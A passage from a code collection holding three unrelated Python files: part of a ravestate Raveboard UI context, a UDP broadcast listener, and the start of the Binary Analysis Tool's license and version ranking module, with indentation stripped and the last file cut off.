@rs.state(cond=rs.sig_startup.detached().min_age(1.), write=rawio.prop_out)
def startup(ctx):
session_db_path = ctx.conf(mod=RAVEBOARD, key=SESSION_DB_KEY)
if session_db_path:
self.session_client = SessionClient(db_path=session_db_path, port=ctx.conf(key=PORT_CONFIG_KEY))
self.config_parsed.set()
if ctx.conf(key=URL_ANNOUNCE_KEY) == ANNOUNCE_URL_YES:
sio_uri = urllib.parse.quote(f"{ctx.conf(key=URL_PREFIX_KEY)}:{ctx.conf(key=PORT_CONFIG_KEY)}")
url = f"{ctx.conf(key=URL_PREFIX_KEY)}:{ctx.conf(key=PORT_CONFIG_KEY)}/ravestate/index.html?rs-sio-url={sio_uri}"
logger.info(f"Raveboard URL: {url}")
ctx[rawio.prop_out] = f"Watch your conversation on Raveboard here! {url}"
@rs.state(cond=rs.sig_startup | sig_heartbeat.min_age(1.), signal=sig_heartbeat, emit_detached=True, boring=True)
def heartbeat(ctx):
self.config_parsed.wait()
if self.session_client and not self.session_client.dead():
self.session_client.heartbeat()
return rs.Emit()
@rs.state(read=rawio.prop_out, signal=sig_last_output, emit_detached=True, boring=True)
def emit_output(ctx):
self.sio.emit("output", {"type": "output", "text": ctx[rawio.prop_out.changed()]})
return rs.Emit(wipe=True)
self._add_ravestate_module(mod)
@rs.receptor(ctx_wrap=self, write=(rawio.prop_in,))
def receive_input(ctx, _, new_input_event):
if 'text' not in new_input_event:
logger.error("Bad socket.io message for input event!")
return
ctx[rawio.prop_in] = new_input_event['text']
self.sio.on("input", receive_input)
@rs.receptor(ctx_wrap=self, write=(rawio.prop_in,))
def new_connection(ctx):
if ctx.conf(mod=RAVEBOARD, key=GREETING_KEY) == GREET_ON_CONNECT:
ctx[rawio.prop_in] = "hi"
@rs.state(
cond=sig_last_output.min_age(rs.ConfigurableAge(key=SESSION_TIMEOUT_KEY)).max_age(-1).detached(),
write=verbaliser.prop_intent,
boring=True)
def end_session(ctx):
if self.session_client:
self.session_client.killme()
ctx[verbaliser.prop_intent] = lang.intent_farewells
mod.add(end_session)
ctx.add_state(end_session)
self.new_connection = new_connection
def ui_model(self, spike_or_act: Union[rs.Spike, rs.Activation], parent_spikes=()) -> Union[UIActivationModel, UISpikeModel]:
if spike_or_act in self.ui_objects:
return self.ui_objects[spike_or_act]
else:
new_id = self.next_id_for_object[spike_or_act.__class__]
self.next_id_for_object[spike_or_act.__class__] += 1
new_obj = None
if isinstance(spike_or_act, rs.Spike):
new_obj = UISpikeModel(
id=new_id,
signal=spike_or_act.id(),
parents=tuple(self.ui_model(parent).id for parent in parent_spikes))
elif isinstance(spike_or_act, rs.Activation):
new_obj = UIActivationModel(
id=new_id,
state=spike_or_act.state_to_activate.name,
specificity=1.,
status="wait",
spikes=[])
else:
logger.error(f"Attempt to retrieve UI model for unknown object {spike_or_act}!")
self.ui_objects[spike_or_act] = new_obj
return new_obj
def ui_update_act(self, act: rs.Activation, is_running=False):
# -- do not report on boring activations
if act not in self.ui_objects and not act.spiky(filter_boring=True):
return
act_model = self.ui_model(act)
update_needed = False
# -- determine status transition
if is_running:
act_model.status = "run"
update_needed = True
else:
act_is_ready = act.constraint.evaluate()
if act_is_ready and act_model.status is "wait":
act_model.status = "ready"
update_needed = True
elif not act_is_ready and act_model.status is "ready":
act_model.status = "wait"
update_needed = True
# -- build spike reference structure, while
# determining whether the activations current one is up-to-date
new_spike_ref_struct = []
fully_unreferenced = True
for i, conj in enumerate(act.constraint.conjunctions()):
new_conj_dict = {}
cur_conj_dict = {}
new_spike_ref_struct.append(new_conj_dict)
if len(act_model.spikes) > i:
cur_conj_dict = act_model.spikes[i]
else:
update_needed = True
for sig in conj.signals():
spike_id = -1
if sig.spike:
spike_model = self.ui_model(sig.spike)
spike_id = spike_model.id
if not spike_model.published:
self.sio.emit("spike", vars(spike_model))
spike_model.published = True
fully_unreferenced = False
new_conj_dict[sig.name] = spike_id
if sig.name not in cur_conj_dict or cur_conj_dict[sig.name] != spike_id:
update_needed = True
# -- update spike ref structure, send activation to frontend on-demand
if update_needed:
act_model.spikes = new_spike_ref_struct
self.sio.emit("activation", vars(act_model))
# -- forget activation, if it was run and it is fully unreferenced
if fully_unreferenced and act_model.status is "run":
del self.ui_objects[act]
# --------------------- Context Overrides ---------------------
def emit(self, signal, parents=None, wipe: bool = False, payload=None, boring=False) -> rs.Spike:
new_spike = super().emit(signal, parents, wipe, payload, boring)
# create spike ui model, but only send it on demand when it is referenced by an activation
# exception: the spike is an offspring spike
spike_model = self.ui_model(new_spike, parent_spikes=parents if parents else ())
if parents:
self.sio.emit("spike", vars(spike_model))
spike_model.published = True
return new_spike
def run_once(self, seconds_passed=1., debug=False):
super(UIContext, self).run_once(seconds_passed, debug)
with self._lock:
acts_to_update = (
{act for act in self.ui_objects if isinstance(act, rs.Activation)} |
self._state_activations())
for act in acts_to_update:
self.ui_update_act(act)
def _state_activated(self, act: rs.Activation):
super(UIContext, self)._state_activated(act)
self.ui_update_act(act, is_running=True)
def _spike_discarded(self, spike: rs.Spike):
super(UIContext, self)._spike_discarded(spike)
self.ui_objects.pop(spike)
|
broadcast_listener.py
|
import socket
import threading
class BroadcastListener:
def __init__(self, channel, port):
self._request_channel = channel
self.listener = socket.socket(
socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)
# Enable to run multiple clients and servers on a single (host,port)
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
# Enable broadcasting mode
self.listener.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.listener.bind(("", port))
def listen(self):
while True:
# wait for incoming data
data, addr = self.listener.recvfrom(1024)
data = data.decode()
# write data to channel to be consumed by server
self._request_channel.produce((data, addr))
def start(self):
listening_thread = threading.Thread(target=self.listen)
listening_thread.start()
|
licenseversion.py
|
#!/usr/bin/python
## Binary Analysis Tool
## Copyright 2011-2016 Armijn Hemel for Tjaldur Software Governance Solutions
## Licensed under Apache 2.0, see LICENSE file for details
import os, os.path, sys, subprocess, copy, cPickle, Queue
import multiprocessing, re, datetime
from multiprocessing import Process, Lock
from multiprocessing.sharedctypes import Value, Array
if sys.version_info[1] == 7:
import collections
have_counter = True
else:
have_counter = False
'''
This file contains the ranking algorithm as described in the paper
"Finding Software License Violations Through Binary Code Clone Detection"
by Armijn Hemel, Karl Trygve Kalleberg, Eelco Dolstra and Rob Vermaas, as
presented at the Mining Software Repositories 2011 conference.
In this scan results can optionally be pruned. Results of scans can get very
large, for example a scan of a Linux kernel image could have thousands of
string matches, which can each be found in a few hundred kernel source code
archives.
By pruning results the amount of noise can be much reduced, reports can be made
smaller and source code checks using the results of BAT can be made more
effective.
To remove a version A from the set of versions the following conditions have
to hold:
* there is a minimum amount of results available (20 or 30 seems a good cut off value)
* all strings/variables/function names found in A are found in the most promising
version
* the amount of strings/variables/function names found in A are significantly
smaller than the amount in the most promising version (expressed as a maximum
percentage)
Ranking results for Java JAR files are aggregated. Individual class files often
do not contain enough information. By aggregating the results of these classes
it is possible to get a better view of what is inside a JAR.
The parameter AGGREGATE_CLEAN can be set to 1 to indicated that .class files
should be removed from the result set after aggregation. By default these files
are not removed.
'''
## lookup tables for names of string caches and string cache scores
stringsdbperlanguagetable = { 'C': 'stringscache_c'
, 'C#': 'stringscache_csharp'
, 'Java': 'stringscache_java'
, 'JavaScript': 'stringscache_javascript'
, 'PHP': 'stringscache_php'
, 'Python': 'stringscache_python'
, 'Ruby': 'stringscache_ruby'
, 'ActionScript': 'stringscache_actionscript'
}
avgstringsdbperlanguagetable = { 'C': 'avgstringscache_c'
, 'C#': 'avgstringscache_csharp'
, 'Java': 'avgstringscache_java'
, 'JavaScript': 'avgstringscache_javascript'
, 'PHP': 'avgstringscache_php'
, 'Python': 'avgstringscache_python'
, 'Ruby': 'avgstringscache_ruby'
, 'ActionScript': 'avgstringscache_actionscript'
}
## mappings from FOSSology to Ninka and vice versa
ninka_to_fossology = { 'LesserGPLv2+': 'LGPL-2.0+'
, 'BSD3': 'BSD-3-Clause'
, 'boostV1Ref': 'BSL-1.0'
}
fossology_to_ninka = { 'No_license_found': 'NONE'
, 'GPL-1.0': 'GPLv1'
, 'GPL-1.0+': 'GPLv1+'
, 'GPL-2.0': 'GPLv2'
, 'GPL-2.0+': 'GPLv2+'
, 'GPL-3.0': 'GPLv3'
, 'GPL-3.0+': 'GPLv3+'
, 'LGPL-2.0': 'LibraryGPLv2'
, 'LGPL-2.0+': 'LibraryGPLv2+'
, 'LGPL-2.1': 'LesserGPLv2.1'
, 'LGPL-2.1+': 'LesserGPLv2.1+'
, 'LGPL-3.0': 'LesserGPLv3'
, 'LGPL-3.0+': 'LesserGPLv3+'
, 'Apache-1.0': 'Apachev1.0'
, 'Apache-1.1': 'Apachev1.1'
, 'Apache-2.0': 'Apachev2'
, 'BSL-1.0': 'boostV1'
, 'MPL-1.0': 'MPLv1_0'
, 'FTL': 'FreeType'
, 'PHP-3.01': 'phpLicV3.01'
, 'Postfix': 'Postfix'
, 'QPL-1.0': 'QTv1'
, 'MPL-1.1': 'MPLv1_1'
, 'Zend-2.0': 'zendv2'
, 'NPL-1.1': 'NPLv1_1'
, 'BSD-2-Clause': 'spdxBSD2'
, 'BSD-3-Clause': 'spdxBSD3'
, 'EPL-1.0': 'EPLv1'
, 'Artifex': 'artifex'
, 'CDDL': 'CDDLic'
, 'Public-domain': 'publicDomain'
, 'Public-domain-ref': 'publicDomain'
, 'IPL': 'IBMv1'
, 'Intel': 'IntelACPILic'
, 'MX4J-1.0': 'MX4JLicensev1'
, 'Beerware': 'BeerWareVer42'
, 'CPL-1.0': 'CPLv1'
, 'Sun': 'sunRPC'
, 'SunPro': 'SunSimpleLic'
, 'W3C-IP': 'W3CLic'
, 'Artistic-1.0': 'ArtisticLicensev1'
}
reerrorlevel = re.compile("<[\d+cd]>")
reparam = re.compile("([\w_]+)\.([\w_]+)")
rematch = re.compile("\d+")
## The scanners that are used in BAT are Ninka and FOSSology. These scanners
## don't always agree on results, but when they do, it is very reliable.
def squashlicenses(licenses):
## licenses: [(license, scanner)]
if len(licenses) != 2:
return licenses
if licenses[0][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[1][0]):
if fossology_to_ninka[licenses[1][0]] == licenses[0][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
else:
status = "difference"
elif licenses[1][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[0][0]):
if fossology_to_ninka[licenses[0][0]] == licenses[1][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
return licenses
def aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None):
## find all JAR files. Do this by:
## 1. checking the tags for 'zip'
## 2. verifying for unpacked files that there are .class files
## 3. TODO: possibly verifying there is a META-INF directory with a manifest
sha256stofiles = {}
jarfiles = []
sha256seen = []
alljarfiles = []
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
else:
filehash = unpackreports[i]['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
if cleanclasses:
if filehash in sha256stofiles:
sha256stofiles[filehash].append(i)
else:
sha256stofiles[filehash] = [i]
## check extension: JAR, WAR, RAR (not Resource adapter), EAR
i_nocase = i.lower()
if i_nocase.endswith('.jar') or i_nocase.endswith('.ear') or i_nocase.endswith('.war') or i_nocase.endswith('.rar'):
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
alljarfiles.append(i)
continue
if filehash in sha256seen:
alljarfiles.append(i)
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if 'tags' in leafreports:
## check if it was tagged as a ZIP file
if 'zip' in leafreports['tags']:
## sanity checks
if unpackreports[i]['scans'] != []:
## since it was a single ZIP file there should be only
## one item in unpackreports[i]['scan']
if len(unpackreports[i]['scans']) != 1:
continue
## more sanity checks
if unpackreports[i]['scans'][0]['offset'] != 0:
continue
if unpackreports[i]['scans'][0]['scanname'] != 'zip':
continue
jarfiles.append(i)
sha256seen.append(filehash)
alljarfiles.append(i)
jartasks = []
for i in jarfiles:
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
classreports = map(lambda x: unpackreports[x], classfiles)
jartasks.append((i, unpackreports[i], classreports, topleveldir))
ranked = set()
if jartasks != []:
res = pool.map(aggregate, jartasks, 1)
for i in res:
(jarfile, rankres) = i
if rankres:
for j in sha256stofiles[unpackreports[jarfile]['checksum']]:
ranked.add(j)
for i in ranked:
if 'tags' in unpackreports[i]:
unpackreports[i]['tags'].append('ranking')
else:
unpackreports[i]['tags'] = ['ranking']
## if cleanclasses is set the following should be removed:
## * reference in unpackreports (always)
## * pickle of file, only if either unique to a JAR, or shared in several JARs,
## but not when the class file can also be found outside of a JAR.
if cleanclasses:
for i in alljarfiles:
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
continue
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
for c in classfiles:
filehash = unpackreports[c]['checksum']
if len(sha256stofiles[filehash]) == 1:
try:
os.unlink(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash))
except Exception, e:
print >>sys.stderr, "error removing", c, e
sys.stderr.flush()
sha256stofiles[filehash].remove(c)
else:
sha256stofiles[filehash].remove(c)
del unpackreports[c]
return ranked
## aggregate results for a single JAR file
def aggregate((jarfile, jarreport, unpackreports, topleveldir)):
rankres = {}
matchedlines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
matchednotclonelines = 0
unmatchedlines = 0
reports = []
extractedlines = 0
nonUniqueAssignments = {}
unmatched = []
ignored = []
nonUniqueMatches = {}
totalscore = 0
scoresperpkg = {}
uniqueMatchesperpkg = {}
packageversionsperpkg = {}
packagelicensesperpkg = {}
fieldmatches = {}
classmatches = {}
sourcematches = {}
## from dynamicres
totalnames = 0
uniquematches = 0
namesmatched = 0
packagesmatched = {}
dynamicresfinal = {}
pv = {}
uniquematcheslenperpkg = {}
upp = {}
aggregated = False
for c in unpackreports:
## sanity checks
if not 'tags' in c:
continue
if not 'ranking' in c['tags']:
continue
filehash = c['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
## read pickle file
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
## and more sanity checks
if not 'binary' in leafreports['tags']:
continue
(stringmatches, dynamicres, varfunmatches, language) = leafreports['ranking']
if language != 'Java':
continue
if 'fields' in varfunmatches:
for f in varfunmatches['fields']:
if not f in fieldmatches:
fieldmatches[f] = varfunmatches['fields'][f]
aggregated = True
else:
fieldmatches[f] += varfunmatches['fields'][f]
if 'classes' in varfunmatches:
for c in varfunmatches['classes']:
if not c in classmatches:
classmatches[c] = varfunmatches['classes'][c]
aggregated = True
else:
classmatches[c] += varfunmatches['classes'][c]
if 'sources' in varfunmatches:
for c in varfunmatches['sources']:
if not c in sourcematches:
sourcematches[c] = varfunmatches['sources'][c]
aggregated = True
else:
sourcematches[c] += varfunmatches['sources'][c]
if stringmatches != None:
aggregated = True
matchedlines = matchedlines + stringmatches['matchedlines']
matchednonassignedlines = matchednonassignedlines + stringmatches['matchednonassignedlines']
matchednotclonelines = matchednotclonelines + stringmatches['matchednotclonelines']
unmatchedlines = unmatchedlines + stringmatches['unmatchedlines']
extractedlines = extractedlines + stringmatches['extractedlines']
if stringmatches['unmatched'] != []:
unmatched = unmatched + stringmatches['unmatched']
if stringmatches['ignored'] != []:
ignored = ignored + stringmatches['ignored']
if stringmatches['nonUniqueAssignments'] != {}:
for n in stringmatches['nonUniqueAssignments'].keys():
if n in nonUniqueAssignments:
nonUniqueAssignments[n] = nonUniqueAssignments[n] + stringmatches['nonUniqueAssignments'][n]
else:
nonUniqueAssignments[n] = stringmatches['nonUniqueAssignments'][n]
if stringmatches['nonUniqueMatches'] != {}:
for n in stringmatches['nonUniqueMatches'].keys():
if n in nonUniqueMatches:
nonUniqueMatches[n] = list(set(nonUniqueMatches[n] + stringmatches['nonUniqueMatches'][n]))
else:
nonUniqueMatches[n] = stringmatches['nonUniqueMatches'][n]
if stringmatches['scores'] != {}:
for s in stringmatches['scores']:
totalscore = totalscore + stringmatches['scores'][s]
if s in scoresperpkg:
scoresperpkg[s] = scoresperpkg[s] + stringmatches['scores'][s]
else:
scoresperpkg[s] = stringmatches['scores'][s]
if stringmatches['reports'] != []:
for r in stringmatches['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
## ignore rank and percentage
if package in uniqueMatchesperpkg:
tmpres = []
for p in unique:
if p[0] in upp:
continue
else:
tmpres.append(p)
upp[p[0]] = 1
uniqueMatchesperpkg[package] = uniqueMatchesperpkg[package] + tmpres
else:
uniqueMatchesperpkg[package] = unique
if packageversions != {}:
if not package in packageversionsperpkg:
packageversionsperpkg[package] = {}
for k in packageversions:
if k in packageversionsperpkg[package]:
packageversionsperpkg[package][k] = packageversionsperpkg[package][k] + packageversions[k]
else:
packageversionsperpkg[package][k] = packageversions[k]
if package in packagelicensesperpkg:
packagelicensesperpkg[package] = packagelicensesperpkg[package] + packagelicenses
else:
packagelicensesperpkg[package] = packagelicenses
if package in uniquematcheslenperpkg:
uniquematcheslenperpkg[package] += uniquematcheslen
else:
uniquematcheslenperpkg[package] = uniquematcheslen
if dynamicres != {}:
aggregated = True
if 'uniquepackages' in dynamicres:
if dynamicres['uniquepackages'] != {}:
if not 'uniquepackages' in dynamicresfinal:
dynamicresfinal['uniquepackages'] = {}
for d in dynamicres['uniquepackages'].keys():
if d in dynamicresfinal['uniquepackages']:
dynamicresfinal['uniquepackages'][d] = list(set(dynamicresfinal['uniquepackages'][d] + dynamicres['uniquepackages'][d]))
else:
dynamicresfinal['uniquepackages'][d] = dynamicres['uniquepackages'][d]
if not aggregated:
return (jarfile, aggregated)
scores_sorted = sorted(scoresperpkg, key = lambda x: scoresperpkg.__getitem__(x), reverse=True)
rank = 1
reports = []
packagecopyrights = []
for s in scores_sorted:
try:
percentage = (scoresperpkg[s]/totalscore)*100.0
except:
percentage = 0.0
reports.append({'rank': rank, 'package': s, 'unique': uniqueMatchesperpkg.get(s,[]), 'uniquematcheslen': uniquematcheslenperpkg.get(s,0), 'percentage': percentage, 'packageversions': packageversionsperpkg.get(s, {}), 'packagelicenses': list(set(packagelicensesperpkg.get(s, []))), 'packagecopyrights': packagecopyrights})
rank = rank+1
if 'uniquepackages' in dynamicresfinal:
dynamicresfinal['namesmatched'] = reduce(lambda x, y: x + y, map(lambda x: len(x[1]), dynamicresfinal['uniquepackages'].items()))
else:
dynamicresfinal['namesmatched'] = 0
dynamicresfinal['uniquematches'] = uniquematches
dynamicresfinal['totalnames'] = namesmatched
dynamicresfinal['packages'] = packagesmatched
unmatched = list(set(unmatched))
unmatched.sort()
rankres['unmatched'] = unmatched
rankres['ignored'] = list(set(ignored))
rankres['matchedlines'] = matchedlines
rankres['matchednonassignedlines'] = matchednonassignedlines
rankres['matchednotclonelines'] = matchednotclonelines
rankres['unmatchedlines'] = unmatchedlines
rankres['extractedlines'] = extractedlines
rankres['nonUniqueAssignments'] = nonUniqueAssignments
rankres['nonUniqueMatches'] = nonUniqueMatches
rankres['reports'] = reports
## now write the new result
## TODO: only do this if there actually is an aggregate result
filehash = jarreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
leafreports['ranking'] = (rankres, dynamicresfinal, {'classes': classmatches, 'fields': fieldmatches, 'sources': sourcematches}, 'Java')
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'wb')
leafreports = cPickle.dump(leafreports, leaf_file)
leaf_file.close()
return (jarfile, aggregated)
def prune(uniques, package):
if have_counter:
uniqueversions = collections.Counter()
else:
uniqueversions = {}
linesperversion = {}
for u in uniques:
(line, res) = u
versions = set()
for r in res:
(checksum, linenumber, versionfilenames) = r
map(lambda x: versions.add(x[0]), versionfilenames)
for version in versions:
if version in linesperversion:
linesperversion[version].add(line)
else:
linesperversion[version] = set([line])
if have_counter:
uniqueversions.update(versions)
else:
for version in versions:
if version in uniqueversions:
uniqueversions[version] += 1
else:
uniqueversions[version] = 1
## there is only one version, so no need to continue
if len(uniqueversions.keys()) == 1:
return uniques
pruneme = set()
unique_sorted_rev = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x), reverse=True)
unique_sorted = sorted(uniqueversions, key = lambda x: uniqueversions.__getitem__(x))
equivalents = set()
for l in unique_sorted_rev:
if l in pruneme:
continue
if l in equivalents:
continue
linesperversion_l = set(linesperversion[l])
pruneremove = set()
for k in unique_sorted:
if uniqueversions[k] == uniqueversions[l]:
## Both versions have the same amount of identifiers, so
## could be the same. If so, add to 'equivalents'
## and skip all equivalents since the results would be the
## same as with the current 'l' and no versions would be
## pruned that weren't already pruned.
if linesperversion[k] == linesperversion_l:
equivalents.add(k)
continue
if uniqueversions[k] > uniqueversions[l]:
break
if set(linesperversion[k]).issubset(linesperversion_l):
pruneme.add(k)
pruneremove.add(k)
## make the inner loop a bit shorter
for k in pruneremove:
unique_sorted.remove(k)
## TODO: pruneme might have length 0, so uniques can be returned. Verify this.
notpruned = set(uniqueversions.keys()).difference(pruneme)
newuniques = []
for u in uniques:
(line, res) = u
newres = []
for r in res:
(checksum, linenumber, versionfilenames) = r
filterres = filter(lambda x: x[0] in notpruned, versionfilenames)
if filterres != []:
newres.append((checksum, linenumber, filterres))
newuniques.append((line, newres))
return newuniques
def determinelicense_version_copyright(unpackreports, scantempdir, topleveldir, processors, scanenv, batcursors, batcons, scandebug=False, unpacktempdir=None):
## sanity check if the database really is there
if batcursors[0] == None:
return None
## the environment might have changed and been cleaned up,
## so overwrite the old one
determineversion = False
if scanenv.get('BAT_RANKING_VERSION', 0) == '1':
determineversion = True
determinelicense = False
if scanenv.get('BAT_RANKING_LICENSE', 0) == '1':
determinelicense = True
determinecopyright = False
if scanenv.get('BAT_RANKING_COPYRIGHT', 0) == '1':
determinecopyright = True
## only continue if there actually is a need
if not determinelicense and not determineversion and not determinecopyright:
return None
## ignore files which don't have ranking results
rankingfiles = set()
filehashseen = set()
hashtoname = {}
rankingfilesperlanguage = {}
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
if not 'tags' in unpackreports[i]:
continue
if not 'identifier' in unpackreports[i]['tags']:
continue
filehash = unpackreports[i]['checksum']
if filehash in hashtoname:
hashtoname[filehash].append(i)
else:
hashtoname[filehash] = [i]
if filehash in filehashseen:
continue
filehashseen.add(filehash)
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if not 'identifier' in leafreports:
continue
language = leafreports['identifier']['language']
if language in rankingfilesperlanguage:
rankingfilesperlanguage[language].add(i)
else:
rankingfilesperlanguage[language] = set([i])
if len(rankingfilesperlanguage) == 0:
return None
## Some methods use a database to lookup renamed packages.
clones = {}
clonedb = scanenv.get('HAVE_CLONE_DB')
if clonedb == 1:
conn = batcons[0]
c = batcursors[0]
c.execute("SELECT originalname,newname from renames")
clonestmp = c.fetchall()
conn.commit()
for cl in clonestmp:
(originalname,newname) = cl
if not originalname in clones:
clones[originalname] = newname
## suck the average string scores database into memory. Even with a few million packages
## this will not cost much memory and it prevents many database lookups.
avgscores = {}
for language in avgstringsdbperlanguagetable:
if not language in rankingfilesperlanguage:
continue
if not language in scanenv['supported_languages']:
continue
## open the database containing all the strings that were extracted
## from source code.
conn = batcons[0]
c = batcursors[0]
avgscores[language] = {}
avgquery = "select package, avgstrings from %s" % avgstringsdbperlanguagetable[language]
c.execute(avgquery)
res = c.fetchall()
conn.commit()
for r in filter(lambda x: x[1] != 0, res):
avgscores[language][r[0]] = r[1]
## create a queue for tasks, with a few threads reading from the queue
## and looking up results and putting them in a result queue
scanmanager = multiprocessing.Manager()
res = []
if processors == None:
processamount = 1
else:
processamount = processors
## now proces each file per language
for language in rankingfilesperlanguage:
if len(rankingfilesperlanguage[language]) == 0:
continue
## creating new queues (max: amount of tasks, or CPUs, whichever is the smallest)
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
reportqueue = scanmanager.Queue(maxsize=0)
lock = Lock()
ignorecache = scanmanager.dict()
lookup_tasks = map(lambda x: (unpackreports[x]['checksum'], os.path.join(unpackreports[x]['realpath'], unpackreports[x]['name'])),rankingfilesperlanguage[language])
map(lambda x: scanqueue.put(x), lookup_tasks)
minprocessamount = min(len(lookup_tasks), processamount)
processpool = []
for i in range(0,minprocessamount):
p = multiprocessing.Process(target=lookup_identifier, args=(scanqueue,reportqueue, batcursors[i], batcons[i],scanenv,topleveldir,avgscores,clones,scandebug,ignorecache, lock))
processpool.append(p)
p.start()
scanqueue.join()
while True:
try:
val = reportqueue.get_nowait()
res.append(val)
reportqueue.task_done()
except Queue.Empty, e:
## Queue is empty
break
reportqueue.join()
for p in processpool:
p.terminate()
## finally shut down the scan manager
scanmanager.shutdown()
for filehash in res:
if filehash != None:
if filehash in hashtoname:
for w in hashtoname[filehash]:
unpackreports[w]['tags'].append('ranking')
## optionally aggregate the JAR files
if 'Java' in rankingfilesperlanguage:
cleanclasses = False
if scanenv.get('AGGREGATE_CLEAN', 0) == '1':
cleanclasses = True
pool = multiprocessing.Pool(processes=processors)
rankedjars = aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None)
pool.terminate()
for r in rankedjars:
## results are now aggregated, so add the JAR file to
## the list of rankingfiles for Java
rankingfilesperlanguage['Java'].add(r)
## .class files might have been removed at this point, so sanity check first
rankingfiles = set()
filehashseen = set()
## sanity check to see if all the ranking files are still there
for l in rankingfilesperlanguage:
newrankingfiles = set()
for i in rankingfilesperlanguage[l]:
if i in unpackreports:
newrankingfiles.add(i)
rankingfilesperlanguage[l] = newrankingfiles
## Determine the most likely versions for each of the scanned binaries.
## Currently finding the version is based on unique matches that were found.
## If determinelicense or determinecopyright are set licenses and copyright statements
## are also extracted.
pruning = False
if 'BAT_KEEP_VERSIONS' in scanenv:
keepversions = int(scanenv.get('BAT_KEEP_VERSIONS', 0))
if keepversions > 0:
## there need to be a minimum of unique hits (like strings), otherwise
## it's silly
if 'BAT_MINIMUM_UNIQUE' in scanenv:
minimumunique = int(scanenv.get('BAT_MINIMUM_UNIQUE', 0))
if minimumunique > 0:
pruning = True
## first determine whether or not there are any unique links at all and
## if there should be database queries
#alluniques = set()
connectdb = False
for language in rankingfilesperlanguage:
if connectdb:
break
## keep a list of versions per sha256, since source files often are in more than one version
for rankingfile in rankingfilesperlanguage[language]:
if connectdb:
break
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
unique = r['unique']
uniques = set(map(lambda x: x[0], unique))
#alluniques.update(uniques)
if unique != []:
connectdb = True
break
if 'versionresults' in functionRes:
for package in functionRes['versionresults'].keys():
if not 'uniquepackages' in functionRes:
continue
connectdb = True
break
if variablepvs != {}:
if language == 'C':
if 'uniquepackages' in variablepvs:
if variablepvs['uniquepackages'] != {}:
connectdb = True
break
if not connectdb:
return
scanmanager = multiprocessing.Manager()
sha256_filename_query = "select version, pathname from processed_file where checksum=%s"
sha256_license_query = "select distinct license, scanner from licenses where checksum=%s"
sha256_copyright_query = "select distinct copyright, type from extracted_copyright where checksum=%s"
for language in rankingfilesperlanguage:
## keep a list of versions per sha256, since source files often are in more than one version
sha256_versions = {}
for rankingfile in rankingfilesperlanguage[language]:
unpackreport = unpackreports[rankingfile]
## read the pickle
filehash = unpackreport['checksum']
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
(res, functionRes, variablepvs, language) = leafreports['ranking']
## indicate whether or not the pickle should be written back to disk.
## If uniquematches is empty, functionRes is empty, and variablepvs
## is also empty, then nothing needs to be written.
changed = False
if res == None and functionRes == {} and variablepvs == {}:
continue
## First process all the string identifiers
if res != None:
newreports = []
for r in res['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
if unique == []:
## Continue to the next item if there are no unique matches
newreports.append(r)
continue
## There are unique matches, so results should
## be written back to disk
changed = True
newuniques = []
newpackageversions = {}
packagecopyrights = []
packagelicenses = []
uniques = set(map(lambda x: x[0], unique))
lenuniques = len(uniques)
## first grab all possible checksums, plus associated line numbers
## for this string. Since these are unique strings they will only be
## present in the package (or clones of the package).
processpool = []
vsha256s = []
scanqueue = multiprocessing.JoinableQueue(maxsize=0)
